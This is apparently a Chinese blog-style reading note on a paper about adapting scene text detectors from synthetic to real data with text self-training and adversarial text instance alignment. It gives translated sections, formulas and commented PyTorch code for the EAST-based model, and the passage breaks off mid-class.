    ​EAST 是一种基于分割的方法,不需要 FPN,对于面积较小的文本实例,$r_i$)比面积大的支承箱数量多,这就导致了支承箱数量(即,$N_s$)的函数。另一方面,SWT 对于消除非文本区域更合理,并且类似的先前工作已经显示了其有效性。SWT 是一个局部图像运算符,它计算每个像素的最可能笔划宽度。SWT 的 输出是一个 $n * m$ 矩阵,其中每个元素包含与该像素相关联的笔划的宽度。具体地说,笔划边界上的每个象素在梯度方向上与笔划的相对侧相连,并且连接线的宽度是该象素的笔划宽度。SWS 利用相应笔画宽度的信息对预测的方框进行评估,并消除部分非文本区域,如图 3(蓝线)所示。对于典型的文本区域,笔画宽度的变化很小,因为文本倾向于保持固定的笔画宽度。我们将第 v 个预测框中的笔划宽度的集合表示为 $W^v_n$,并且将 $u_{th}$ 像素的笔划宽度表示为 $w^v_u\in W^v_n$。标准差如下:

    $$\sigma_v=\sqrt{\frac{1}{N}\sum_{u=1}N(w_uv-\muv)2}$$

    ​其中 $\mu^v$ 是 $v_{th}$ 个预测框中的平均笔画宽度。因此,每个预测框都有一个关于笔画宽度的标准差($\sigma$),我们选择具有上限阈值($\epsilon _1$)的可靠框。此外,我们还通过 SWS 进一步过滤框:

    $$SWS_v=\frac{w_v}{\sigma_v^2}$$

    ​$w_v$ 是第 $v$ 个预测框的最常见的笔画宽度值。通过用较低的阈值 $\epsilon_2$ 对分数进行阈值化,进一步选择框。图 3(b)显示部分 FP 被 SWS 和$\sigma$ 滤除。

    4 Experiments

    ​通过将场景文本检测器从合成数据集转移到真实的数据集来评估所提出的方法。我们采用几个纯合成数据和真实的场景数据(即,SynthText 和 ICDAR2015),它们具有共同的注释风格(即,字级)。

    4.1 Dataset and Experimental Settings

    4.1.1 Pure Synthetic Datasets.

    • SynthText 是一个包含约 80 万合成图像的大规模数据集。这些图像是通过将自然图像与随机字体,大小,颜色和方向渲染的文本混合而创建的,因此这些图像非常逼真。

    • VISD 包含与 10k 背景图像合成的 10k 图像。因此,该数据集没有重复的背景图像。丰富的背景图像使该数据集更加多样化。

    4.1.2 Real Datasets.

    • ICDAR 2015 是一个面向英文文本的多方向文本检测数据集,仅包含 1,000 张训练图像和 500 张测试图像。此数据集中的场景文本图像由 Google 眼镜拍摄,没有考虑定位,图像质量和视点。该数据集具有小的,模糊的和多方向的文本实例。

    • ICDAR 2013 在 ICDAR 2013 Robust 阅读竞赛期间发布,用于聚焦场景文本检测,包括高分辨率图像,229 用于训练,233 用于测试,包含英文文本。

    4.1.3 Implementation Details.

    ​在所有实验中,我们使用 EAST 作为基础网络。在原始论文之后,输入被调整为 512×512,并且我们应用了原始论文中使用的所有增强。该网络使用由 12 幅图像组成的批量输入进行训练,其中 6 幅图像来自源域,另外 6 幅图像来自目标域。Adam 优化器被采用作为我们的学习率方案。所有实验都使用相同的训练策略:

    1. 使用 ATA 对网络进行 80k 次迭代的预训练,以学习域不变特征,
    2. 使用预训练的模型来生成相应的伪标签(即,伪边界框标签和负样本图),然后用生成的伪标签微调预训练模型。在生成伪标签的过程中,我们将笔划宽度消除参数设置为 3.0 和 0.30。

    ​所有实验都在常规工作站(CPU:Intel(R)Core(TM)i7- 7800 X CPU@3.50 GHz; GPU:GTX 2080 Ti)上进行。

    4.2 Performance Comparison and Analysis

    webp

    不同模型在 Syn2Real 场景文本检测数据集上的性能,用于 SynthText/VISD → ICDAR 2015 传输。UL 指未标记的数据。* 表示 UnrealText 中报告的性能。† 指的是我们的测试性能。

    webp

    不同模型在 Syn2Real 场景文本检测数据集上的性能,用于 SynthText/VISD → ICDAR 2013 传输。UL 指未标记的数据。*表示 UnrealText 中报告的性能。† 指的是我们的测试性能。

    4.2.1 Synthetic→ ICDAR2015 Transfer.

    ​表 1 总结了合成→ ICDAR 2015 转移任务的性能比较。EAST 模型作为仅使用源代码的基线训练具有不令人满意的 F 分数(使用 SynthText 为 60.5%,使用 VISD 为 64.5%),这可以被视为没有自适应的下限。通过结合所提出的方法,F-评分分别达到 68.0% 和 73.8%,比基线分别提高了 7.5% 和 9.3%。基于字符注释的 GCN 比基于单词注释的性能有所提高。然而,GCN 的性能仍然低于我们的方法,它利用了自我训练和对抗学习。实验结果表明,该方法能够有效地消除源数据和目标数据的领域差异。

    4.2.2 Synthetic→ ICDAR2013 Transfer.

    ​为了进一步验证该方法的有效性,以 ICDAR 2013 为目标域,进行了合成到真实的场景文本检测迁移的实验。实验结果报告在表 2 中。具体来说,对于 SynthText→ ICDAR 2013 转移任务,与仅使用源代码的基线 EAST 训练相比,我们实现了 11.3% 的性能提升。与合成→ICDAR2015 转移实验类似,VISD 也被用作比较实验中的源域。在使用 ATA 和 TST 后,该方法比基线 EAST 的性能提高了 6.3%,这表明该方法在减少域偏移方面的有效性。请注意,为了公平比较,除了添加 ATA 和 TST 之外,所提出的方法的基础网络和实验设置与基线 EAST 相同。

    4.2.3 ICDAR2013→ ICDAR2015 Transfer.

    ​表 3 显示了 ICDAR 2013 → ICDAR 2015 转移任务的性能。ICDAR 2013 的注释是矩形框,而 ICDAR 2015 的注释是旋转框,这限制了传输性能。然而,与仅使用源代码的基线 EAST 训练相比,我们实现了 7.6% 的性能提升。

    webp

    不同型号的检测结果示例。第一行是仅使用源域的基线训练的结果。第二行是使用所提出方法的结果。

    4.3 Ablation Study

    4.3.1 Component Analysis.

    ​为了验证所提出方法的有效性,我们在四个数据集上进行了 Syn2Real 转移任务的消融实验:SynthText、VISD、ICDAR2015 和 ICDAR2013。表 3 显示了实验结果。对于 SynthText→ICDAR2015 转移任务,使用 TST 和 ATA 后,F-得分分别提高了 4.1% 和 3.5%。此外,我们的方法比基线产生了高达 8% 的召回率,这表明了这种方法在提高模型鲁棒性方面的有效性。通过结合这两个组成部分,所提出方法的 F-得分达到了 68.0%,比基线绝对提高了 7.5%。VISD→ICDAR2015 转移任务表现更好,因为 VISD 具有更真实的合成效果。特别是,使用我们的方法的 F-得分达到了 73.8%,比相应的基线绝对提高了 9.3%。对于 SynthText/VISD→ICDAR2015 的传输,性能的提高也很显著。我们使用 SynthText 实现了 11.3% 的性能改进,使用 VISD 实现了 6.3% 的性能改善。

    webp

    消融研究所提出的 Syn2Real 场景文本检测转移。“基线”表示仅使用源域中的标记数据进行训练。表示与仅使用源代码的基线训练相比,F-分数的增加。UL 指未标记的数据。'F-target'表示在源域中进行预训练,并在目标域中使用原始伪边界框进行微调。

    4.3.2 Parameter Sensitivity on TST.

    ​为了探索阈值参数(即,在 SWS 上,我们进行了几组比较实验,结果如表 4 所示。由于我们认为在理想情况下文本区域中的笔画宽度的标准差接近于零,因此使用阈值参数 $\epsilon_1$ 来过滤预测框。结果表明,当神经网络的参数为 1 时,网络的性能最好,且网络的性能对参数的变化不敏感。与 $\epsilon_1$ 相似,采用 0.2、0.3、0.4 三个不同的值对 $\epsilon_2$ 的参数敏感性进行了验证,结果表明 $\epsilon_2$ 的值(0.3)是合理的。

    webp

    4.3.3 Qualitative Analysis.

    ​图 4 示出了用于合成到真实的转换任务的文本检测结果的四个示例。实验结果表明,该方法提高了模型在不同复杂背景和不同文本下的鲁棒性。TST 最小化了 FP 和 FN 的一部分,如第一列示例所示,ATA 帮助模型学习更多有区别的特征。

    webp

    5 Conclusions

    ​本文首先介绍了一种用于场景文本检测的合成域到真实的域自适应方法,该方法将知识从合成数据(源域)转移到真实的数据(目标域)。提出的文本自训练(TST)有效地减少了伪标签的假阴性和假阳性的不利影响,而对抗性文本实例对齐(ATA)有助于网络以对抗的方式学习更多的域不变特征。我们评估了所提出的方法与 EAST 在几个常见的合成和真实的数据集。实验结果表明,该方法对于合成到真实的迁移文本检测任务有很大的改进。

    ]]>
    + 资源

    全文

    Abstract

    ​基于深度学习的场景文本检测算法在充分利用已标注的训练数据的基础上,能够获得较好的检测性能。然而,手动贴标签费时费力。在极端情况下,相应的注释数据不可用。利用合成数据是一种非常有前途的解决方案,但合成数据与真实的数据之间的域分布不匹配除外。针对场景文本检测中存在的严重域分布不匹配问题,提出了一种从合成域到真实的域的自适应场景文本检测方法。本文提出了一种基于**文本自训练(TST)和对抗性文本实例对齐(ATA)**的自适应场景文本检测方法。ATA 通过以对抗的方式训练域分类器来帮助网络学习域不变特征。TST 减少了来自不准确伪标签的假阳性(FP)和假阴性(FN)的不利影响。当从合成场景适应到真实的场景时,两个分量对提高场景文本检测器的性能有积极的作用。我们通过从 SynthText、VISD 转移到 ICDAR2015、ICDAR2013 对所提出的方法进行了评估。实验结果验证了所提方法的有效性,提高了 10% 以上,对领域自适应场景文本检测具有重要的探索意义。

    1 Introduction

    ​场景文本检测因其在计算机视觉中的众多应用而受到越来越多的关注。此外,在过去的几十年里,场景文本检测取得了巨大的成功。然而,这些检测方法需要手动标记大量的训练数据,这非常昂贵且耗时。虽然已经存在几个公共基准,但它们只涵盖了非常有限的场景。在现实世界中,特定的应用程序任务通常需要收集和注释新的训练数据集,而收集足够的标记数据是困难的,甚至是不可能的。因此,昂贵的标签成本已成为基于深度学习方法的文本检测应用的主要问题

    ​随着计算机图形学的飞速发展,一种可供选择的方法是利用大量可从虚拟世界中获得的合成数据,并且可以自由地和自动地生成地面实况。

    • SynthText 首先提供了一个虚拟场景文本数据集,并自动生成带有单词级和字符级注释的合成图像。
    • VISD 为文本合成配备了选择性语义分割,以产生更真实的样本。
    • UnrealText 通过 3D 图形引擎提供逼真的虚拟场景文本图像,该 3D 图形引擎通过将场景和文本作为一个整体呈现来提供逼真的外观。

    ​尽管合成数据提供了在训练场景文本检测器中替代真实的图像的可能性,其具有低标注成本和高标注精度,但是许多先前的工作也表明,由于被称为“域移位 Domain Shift”的现象,仅使用合成数据的训练降低了对真实的数据的性能。如图 1 所示,与常见对象不同,文本在现实场景中具有更多的形状、颜色、字体、大小和方向的多样性,这导致合成数据与真实的数据之间存在较大的域差距。因此,当仅从合成数据向真实的数据应用模型学习时,模型的性能显著降低。

    webp

    不同数据集的例子。第一行分别来自真实的 ICDAR 2013、ICDAR 2015 和 ICDAR 2017 MLI。
    第二行来自 SynthText、VISD 和 UnrealText。在合成数据和真实的数据之间仍有相当大的领域差距。

    ​为了解决域偏移问题,提出了一种基于合成到真实的域的场景文本检测方法,该方法利用合成数据和未标记的真实的数据,有效地提高了模型在真实的数据上的性能。受 [1909.00597] Self-Training and Adversarial Background Regularization for Unsupervised Domain Adaptive One-Stage Object Detection (arxiv.org)[1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org) 的启发,本文提出了一种文本自训练(TST)方法和**一种对抗性文本实例对齐(ATA)**来减少域移位。

    自训练在领域自适应常见对象检测和语义分割方面取得了出色的结果。然而,场景文本检测任务更多样化的情况下,复杂的背景还没有在这个方向上探索。为了更好地将自训练应用于场景文本检测,TST 用于抑制伪标签中出现的假阳性和假阴性的不利影响。此外,我们首先利用对抗学习帮助模型学习场景文本的区分特征。对**抗性学习已被证明在域自适应图像分类和常见对象检测等任务中是有效的。由于大多数场景文本检测器都是单阶段检测器,因为它们没有区域建议过程,因此我们提出 ATA 以对抗训练方式对齐文本实例的判别特征。**本文的主要贡献如下:

    • 我们引入文本自训练(TST),通过最小化不准确伪标签的不利影响来提高域自适应场景文本检测的性能。
    • 我们提出了**对抗性文本实例对齐(ATA)**来帮助模型学习域不变特征,从而增强模型的泛化能力。
    • 我们首先介绍了一种用于场景文本检测的合成到真实的域自适应方法,该方法将知识从合成数据(源域)转移到真实的数据(目标域)。

    ​通过针对场景文本检测传输任务(例如,SynthText → ICDAR 2015)。实验结果表明,该方法能够有效解决场景文本检测中的域偏移问题,对领域自适应场景文本检测具有重要的探索意义。

    2.1 Scene Text Detection

    ​简介场景文本检测。

    2.2 Domain Adaptation

    领域自适应减少了训练数据和测试数据之间的领域差距。最近的方法使用更有效的方法来减少域间隙,例如将域分类器与梯度反转结合。

    2.3 Self-Training

    ​先前的工作使用自我训练来弥补分类信息的缺乏。然而,由于前期工作的不足,文本检测在自训练方法上还需要进一步的探索。

    3 Proposed Method

    ​在这一节中,分析了由畴移引起的问题。此外,我们介绍了 TST 和 ATA 的原理,以及如何使用它们进行域适配。为了评估我们的方法,采用 EAST 作为基线。

    3.1 Problem and Analysis

    虽然合成场景文本数据可以自动生成多样化的外观和准确的 GT,但仅用合成数据训练的模型不能直接应用于真实的场景,因为合成数据集和真实的数据集之间存在显著的域偏移。从概率的角度看问题会更清楚。我们将合成数据域称为源域,将真实的数据域称为目标域。场景文本检测问题可以看作是学习后验 $P(B|I)$(已知图像特征求预测边界框),其中 $I$ 是指图像特征,$B$ 是文本实例的预测边界框。使用贝叶斯公式,后验 $P(B|I)$ 可以分解为:

    $$P(B|I)=\frac{P(I|B)*P(B)}{P(I)}=\frac{P(I|B)}{P(I)}*P(B)$$

    ​我们在此任务中进行协变量移位假设,即先验概率 $P(B)$ 对于两个域是相同的(预测边界框的划定相同,正确划定出文本的范围)。$P(I|B)$是指 $I$ 的条件概率,这意味着在给定预测结果为真的情况下学习到真特征的可能性。我们还考虑了 $P(I|B)$ 对于两个域而言是相同的。因此,后验概率的差异由先验概率 $P(I)$ 引起(提取出的特征不同)。换句话说,为了检测文本实例,检测结果中的差异是由域改变特征引起的。为了提高模型的泛化能力,模型需要学习更多的域不变特征,无论输入图像属于哪个域都保持相同的 $P(I)$(迫使模型在读取合成数据和真实数据时,都提取出同样的特征)。在 EAST 模型中,图像特征 $P(I)$ 是指从 backbone 输出的特征。因此,特征图应该在源域和目标域之间对准(即,$P_{s}(I)=P_{t}(I)$)。为了实现这一目标,我们建议 ATA 协调这些特性,下一小节将介绍更多详细信息。

    3.2 Adversarial Text Instance Alignment

    ​受 [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org) 的启发,采用 ATA 来帮助网络学习域不变特征。在 EAST 模型中,图像特征 $P(I)$ 是指主干的特征图输出(即,384,图 2 中的 1/32 特征)。为了在源域和目标域之间对齐特征 $P(I)$,使用域分类器来混淆特征域。具体地,针对每个输入图像训练域分类器,并预测图像所属的域标签(代码中 y_pred_prob_f)。我们假设模型的输入样本为 $x\in X$,其中 $X$ 是某个输入空间。$y_i$ 表示第 $i$ 个训练图像的域标签(代码中 y_true),对于源域 $y_i=0$,对于目标域 $y_i = 1$。$p_i(x)$ 是域分类器的输出,我们使用交叉熵作为损失函数:

    $$L_d=-\sum_i(y_i\times ln^{p_i(x)}+(1-y_i)\times ln^{1-p_i(x)})$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    def bce_loss(y_true, y_pred_logits):
    # y_true:真实标签(0 或 1)。
    # y_pred_logits:模型的原始预测值(logits),即未经过激活函数的输出。
    # y_pred_prob = F.sigmoid(y_pred_logits)
    # y_true_f = y_true.view(-1)
    # y_true_f = y_true
    y_pred_logits = y_pred_logits.view(-1)
    y_pred_prob_f = y_pred_logits.clamp(min=1e-7, max=1 - 1e-7) # 调整预测值范围:将预测值限制在 [1e-7, 1 - 1e-7] 之间,以防止对数计算时出现数值不稳定。
    return -(y_true * y_pred_prob_f.log() + (1. - y_true) * (1 - y_pred_prob_f).log()).mean() # 计算交叉熵损失,并返回平均损失。

    ​为了学习域不变特征,我们以对抗的方式优化参数。通过最小化上述域分类损失来优化域分类器的参数,并且通过最大化该损失来优化基础网络的参数。更详细地说,梯度反转层(GRL)被添加在 EAST 的主干和域分类器之间,当通过 GRL 层时,梯度的符号被反转(梯度反转层主要同在特征提取器与域分类器之间,那么在反向传播过程中,域分类器的域分类损失的梯度反向传播到特征提取器的参数之前会自动取反,进而实现了类似与 GAN 的对抗损失。)。如图 2 所示,特征金字塔网络(FPN)和骨干网在训练阶段都最小化了 EAST 的原始损失 $L_{task}$。$L_{task}$ 具体表示 EAST 中的评分图损失几何形状损失。$L^t_{task}$ 任务是指在目标域中使用伪标签进行训练,$L^s_{task}$ 任务表示在源域中进行训练。因此,不同参数空间的训练目标不同:

    $$\begin{cases}L_f=\min(L_{task}t(\theta_f|xt)+L_{task}s(\theta_f|xs)-\lambda L_d(\theta|(xs,xt)))&\theta_f\in F ,\L_d=\min(L_d(\theta_d|(xs,xt)))&\theta_d\in C ,\L_h=\min(L_{task}t(\theta_h|xt)+L_{task}s(\theta_h|xs))&\theta_h\in D ,\end{cases}$$

    • 骨干网络的目标:最小化检测的损失、最大化域分类器的损失(既要骗过 Domain Classifier,又要提取出有价值的特征。
    • 域分类器的目标:最小化域分类器的损失
    • FPN 的目标:最小化检测的损失(依旧做标签预测。

    ​其中 $F$、$C$、$D$ 分别是骨干、域分类器和 FPN 的参数空间。总体训练目标如下:

    $$L=L_f+L_h+\lambda L_d$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    class Loss_target(nn.Module):
    def __init__(self, weight_angle=10):
    # 角度损失的权重系数。默认为 10,用于控制角度损失在总损失中的影响程度。
    super(Loss_target, self).__init__()
    self.weight_angle = weight_angle
    self.bce = bce_loss
    # 指定使用的二分类交叉熵损失函数 (bce_loss),它在 forward 方法中用来计算领域损失。

    def forward(self, gt_score, pred_score, gt_geo, pred_geo, ignored_map,pre_domain):
    if torch.sum(gt_score) < 1:
    return torch.sum(pred_score + pred_geo) * 0
    # 如果 gt_score 的总和小于 1(表示没有有效的目标),则返回 0 作为损失,避免计算损失时出现错误或不必要的计算。

    classify_loss = get_dice_loss(gt_score, pred_score*(1-ignored_map))
    # 使用 get_dice_loss 计算分类损失。pred_score * (1 - ignored_map) 是预测分数与忽略区域掩码结合后的结果,确保在计算损失时忽略掉指定的区域。

    gt_doamin = torch.Tensor([[[1.]]]).to(torch.device("cuda"))
    doamin_loss = self.bce(gt_doamin, pre_domain)
    # 生成一个目标领域分数 gt_doamin,设为 1,并将其转移到 GPU 设备上。使用 bce_loss 计算领域损失,这里领域损失衡量模型预测的领域分数与目标领域分数之间的差异。

    iou_loss_map, angle_loss_map = get_geo_loss(gt_geo, pred_geo)

    angle_loss = torch.sum(angle_loss_map * gt_score) / torch.sum(gt_score)
    iou_loss = torch.sum(iou_loss_map * gt_score) / torch.sum(gt_score)
    geo_loss = self.weight_angle * angle_loss + iou_loss
    # 使用 get_geo_loss 计算几何损失,包括交并比(IoU)损失和角度损失。
    # 计算角度损失和 IoU 损失,并根据 weight_angle 进行加权,得到总的几何损失。
    # print('classify loss is {:.8f}, angle loss is {:.8f}, iou loss is {:.8f}'.format(classify_loss, angle_loss, iou_loss))
    return geo_loss, classify_loss, doamin_loss # 返回三个损失值:几何损失、分类损失和领域损失。

    ​其中 $\lambda$ 是权衡参数,我们在所有实验中将其设置为 0.2。通过优化损失,网络可以学习更多的文本域不变特征,更好地从合成数据转换到真实的数据。

    webp

    具有相应优化对象的网络架构。$\theta$ 表示 EAST 的参数。域分类器(绿色)经由梯度反转层添加在特征提取器之后,梯度反转层在基于反向传播的训练期间将梯度乘以某个负常数。$L_{task}$ 是 EAST 原有的检测损失,$L_d$ 是领域分类器的损失

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    cfg = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']  # 配置列表,指定网络层的类型和数量。

    def make_layers(cfg, batch_norm=False):
    layers = [] # 列表用于存储创建的层。
    in_channels = 3 # 初始化为 3,对应输入图像的通道数。
    for v in cfg:
    if v == 'M': # 如果值为 'M',添加一个 2x2 的最大池化层。
    layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
    else: # 否则,创建一个卷积层(nn.Conv2d),后跟可选的批归一化层和 ReLU 激活函数。
    conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
    if batch_norm:
    layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
    else:
    layers += [conv2d, nn.ReLU(inplace=True)]
    in_channels = v # 更新 in_channels 为当前卷积层的输出通道数 v。
    return nn.Sequential(*layers) # 使用 nn.Sequential 将所有层打包成一个顺序容器,返回构造好的网络层。


    class VGG(nn.Module):
    def __init__(self, features):
    super(VGG, self).__init__()
    self.features = features # self.features:存储卷积层。
    self.avgpool = nn.AdaptiveAvgPool2d((7, 7)) # 自适应平均池化层,将特征图大小调整为 7x7。
    self.classifier = nn.Sequential(
    nn.Linear(512 * 7 * 7, 4096),
    nn.ReLU(True),
    nn.Dropout(),
    nn.Linear(4096, 4096),
    nn.ReLU(True),
    nn.Dropout(),
    nn.Linear(4096, 1000),
    ) # 全连接层的序列,包括两个 ReLU 激活层和 Dropout 层,用于分类。

    for m in self.modules(): # 初始化权重
    if isinstance(m, nn.Conv2d):
    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
    if m.bias is not None:
    nn.init.constant_(m.bias, 0)
    elif isinstance(m, nn.BatchNorm2d):
    nn.init.constant_(m.weight, 1)
    nn.init.constant_(m.bias, 0)
    elif isinstance(m, nn.Linear):
    nn.init.normal_(m.weight, 0, 0.01)
    nn.init.constant_(m.bias, 0)

    def forward(self, x):
    x = self.features(x) # 通过 self.features 处理输入 x。
    x = self.avgpool(x) # 应用自适应平均池化,将特征图调整为 7x7。
    x = x.view(x.size(0), -1) # 将池化后的特征图展平,以适应全连接层输入。
    x = self.classifier(x) # 通过 self.classifier 进行最终的分类预测。
    return x


    class extractor(nn.Module): # 特征提取层。
    def __init__(self, pretrained):
    super(extractor, self).__init__()
    vgg16_bn = VGG(make_layers(cfg, batch_norm=True)) # 使用 VGG 类创建带有批量归一化的 VGG16 网络。
    if pretrained:
    # state_dict = load_state_dict_from_url('https://download.pytorch.org/models/vgg16-397923af.pth')
    # vgg16_bn.load_state_dict(state_dict)
    if pretrained: # 如果 pretrained 为 True,则加载本地路径的预训练权重。
    vgg16_bn.load_state_dict(torch.load(
    '/data/data_weijiawu/Sence_Text_detection/Paper-ACCV/baseline/EAST_1/vgg16_bn-6c64b313.pth'))
    self.features = vgg16_bn.features # self.features 被设置为 VGG16 网络的卷积层部分。(使用 VGG16 进行特征提取)

    def forward(self, x):
    out = []
    for m in self.features: # 遍历 self.features 中的每一层,对输入 x 进行逐层处理。
    x = m(x)
    if isinstance(m, nn.MaxPool2d): # 将每个最大池化层的输出保存到 out 列表中。
    out.append(x)
    return out[1:] # 返回 out[1:],即从第二个池化层开始的特征图。这通常是为了匹配特定的特征提取需求。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    class merge(nn.Module):  # EAST 的核心特征融合层。负责在特征图上进行一系列卷积操作并融合来自不同尺度的特征。它的主要任务是通过逐步上采样和融合不同层的特征图来生成最终的输出特征图。这通常用于目标检测和分割任务中的特征融合阶段。
    def __init__(self):
    super(merge, self).__init__()

    self.conv1 = nn.Conv2d(1024, 128, 1)
    self.bn1 = nn.BatchNorm2d(128)
    self.relu1 = nn.ReLU()
    self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
    self.bn2 = nn.BatchNorm2d(128)
    self.relu2 = nn.ReLU()

    self.conv3 = nn.Conv2d(384, 64, 1)
    self.bn3 = nn.BatchNorm2d(64)
    self.relu3 = nn.ReLU()
    self.conv4 = nn.Conv2d(64, 64, 3, padding=1)
    self.bn4 = nn.BatchNorm2d(64)
    self.relu4 = nn.ReLU()

    self.conv5 = nn.Conv2d(192, 32, 1)
    self.bn5 = nn.BatchNorm2d(32)
    self.relu5 = nn.ReLU()
    self.conv6 = nn.Conv2d(32, 32, 3, padding=1)
    self.bn6 = nn.BatchNorm2d(32)
    self.relu6 = nn.ReLU()

    self.conv7 = nn.Conv2d(32, 32, 3, padding=1)
    self.bn7 = nn.BatchNorm2d(32)
    self.relu7 = nn.ReLU()

    for m in self.modules():
    if isinstance(m, nn.Conv2d):
    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
    if m.bias is not None:
    nn.init.constant_(m.bias, 0)
    elif isinstance(m, nn.BatchNorm2d):
    nn.init.constant_(m.weight, 1)
    nn.init.constant_(m.bias, 0)

    def forward(self, x):
    # F.interpolate:将特征图上采样到较大的空间分辨率,使用 bilinear 插值方法。
    # torch.cat:将上采样后的特征图与来自不同层的特征图沿通道维度拼接,结合不同尺度的信息。
    y = F.interpolate(x[3], scale_factor=2, mode='bilinear', align_corners=True)
    y = torch.cat((y, x[2]), 1)
    y = self.relu1(self.bn1(self.conv1(y)))
    y = self.relu2(self.bn2(self.conv2(y)))

    y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
    y = torch.cat((y, x[1]), 1)
    y = self.relu3(self.bn3(self.conv3(y)))
    y = self.relu4(self.bn4(self.conv4(y)))

    y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
    y = torch.cat((y, x[0]), 1)
    y = self.relu5(self.bn5(self.conv5(y)))
    y = self.relu6(self.bn6(self.conv6(y)))

    y = self.relu7(self.bn7(self.conv7(y)))
    return y


    class output(nn.Module): # 输出层
    def __init__(self, scope=512):
    super(output, self).__init__()
    self.conv1 = nn.Conv2d(32, 1, 1) # 卷积层,用于处理输入的特征图。它们的输出通道数不同,目的是生成不同类型的预测。
    self.sigmoid1 = nn.Sigmoid() # 分别应用于卷积层输出的 Sigmoid 激活函数,用于输出概率。

    # self.conv1_1 = nn.Conv2d(32, 1, 1)
    # self.sigmoid1_1 = nn.Sigmoid()

    self.conv2 = nn.Conv2d(32, 4, 1)
    self.sigmoid2 = nn.Sigmoid()
    self.conv3 = nn.Conv2d(32, 1, 1)
    self.sigmoid3 = nn.Sigmoid()
    self.scope = 512 # 一个用于缩放位置预测的参数,设为 512。

    # GRL domina classifier
    # self.gap = nn.AdaptiveAvgPool2d(1)
    # self.sigmoid_gap = nn.Sigmoid()
    # self.GRL = RevGrad()
    # self.conv_gap = nn.Conv2d(32, 1, 1)

    for m in self.modules():
    if isinstance(m, nn.Conv2d):
    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu') # 卷积层的权重使用 Kaiming 正态分布初始化,偏置项初始化为 0。
    if m.bias is not None:
    nn.init.constant_(m.bias, 0)

    def forward(self, x):
    # score_1 = self.GRL(x)
    # grl = self.sigmoid_gap(self.conv_gap(score_1))

    # domain_feature = self.gap(self.GRL(C[3]))
    # class_domain = self.sigmoid_gap(self.conv_gap(domain_feature))

    score = self.sigmoid1(self.conv1(x)) # 第一个卷积层的输出,经过 Sigmoid 激活函数处理,代表得分图。
    loc = self.sigmoid2(self.conv2(x)) * self.scope # 第二个卷积层的输出,经过 Sigmoid 激活函数处理并缩放,表示位置预测。
    angle = (self.sigmoid3(self.conv3(x)) - 0.5) * math.pi # 第三个卷积层的输出,经过 Sigmoid 激活函数处理并调整,表示角度预测。
    geo = torch.cat((loc, angle), 1) # 将位置和角度预测拼接起来,形成最终的几何输出。
    return score, geo
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    class DAImgHead(nn.Module):
    """
    Adds a simple Image-level Domain Classifier head 添加一个图像级领域分类器头,用于图像层面的分类。
    """

    def __init__(self):
    """
    Arguments:
    in_channels (int): number of channels of the input feature 输入特征的通道数
    USE_FPN (boolean): whether FPN feature extractor is used 是否使用 FPN 特征提取器
    """
    super(DAImgHead, self).__init__()

    self.conv1_da = nn.Conv2d(512, 256, kernel_size=1, stride=1) # 一个卷积层,将输入通道数从 512 转换为 256。
    self.conv2_da = nn.Conv2d(256, 1, kernel_size=1, stride=1) # 一个卷积层,将通道数从 256 转换为 1。

    for l in [self.conv1_da, self.conv2_da]: # 权重初始化为均值为 0,标准差为 0.001 的正态分布,偏置初始化为 0。
    torch.nn.init.normal_(l.weight, std=0.001)
    torch.nn.init.constant_(l.bias, 0)

    def forward(self, x): # 输入 x 经过 conv1_da 和 ReLU 激活函数后,再经过 conv2_da 得到输出。
    t = F.relu(self.conv1_da(x))
    return self.conv2_da(t)


    class DAInsHead(nn.Module):
    """
    添加一个实例级领域分类器头,用于实例级别的分类。
    Adds a simple Instance-level Domain Classifier head
    """

    def __init__(self):
    """
    Arguments:
    in_channels (int): number of channels of the input feature
    """
    super(DAInsHead, self).__init__()
    self.fc1_da = nn.Linear(2028, 1024) # 一个全连接层,将 2028 个输入特征转换为 1024 个输出特征。
    self.fc2_da = nn.Linear(1024, 1024) # 一个全连接层,将 1024 个输入特征转换为 1024 个输出特征。
    self.fc3_da = nn.Linear(1024, 1) # 一个全连接层,将 1024 个输入特征转换为 1 个输出特征。
